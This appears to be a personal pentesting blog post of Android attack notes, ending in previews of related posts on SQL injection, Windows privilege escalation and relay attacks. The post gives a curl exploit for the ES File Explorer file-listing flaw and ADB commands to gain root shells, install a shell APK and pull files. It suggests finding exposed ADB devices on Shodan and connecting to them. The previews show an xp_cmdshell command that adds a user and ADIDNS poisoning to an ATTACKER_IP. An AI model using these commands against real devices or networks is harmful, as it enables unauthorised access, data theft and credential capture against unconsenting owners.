Skip to main content

Android Pentest

By 




Port Scan on Android

as many random ports can be open on Android devices, its always better to scan all the ports using  

https://github.com/RustScan/RustScan/releases 
download the debian package 
dpkg -i filename
rustscan -a 10.10.10.247 

now scan all the open ports with nmap -sC -sV to run default script and for version scan.
Installing ADB 

sudo apt-get install android-tools-adb 
Abusing ES File Explorer Vuln

Exploiting can be downloaded from here 

or can use curl to abuse it 


curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777
ADB Commands

ADB Cheatsheet is here

#Port forward a port from the Android device to ADB 
sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local

#Connect to a device over wireless
adb tcpip 9090

#connect to the service
adb connect 127.0.0.1:5555

#list connected devices
adb devices

#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell


#get a shell
adb shell

#get root privs from a shell
su

#install an apk 
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"

#Getting screenshots
adb shell screencap <path to save>

#Recording the screen
adb shell screenrecord <path to save>

#Downloading files
adb pull <source file path> <destination file path>

#Uploading files
adb push <source file path> <destination file path>

#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>

#Getting system information
getprop
Finding Devices on Shodan 

android debug bridge
adb connect 100.100.100.100:5555
Get Remote Access of a device

apt install scrcpy
scrcpy

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more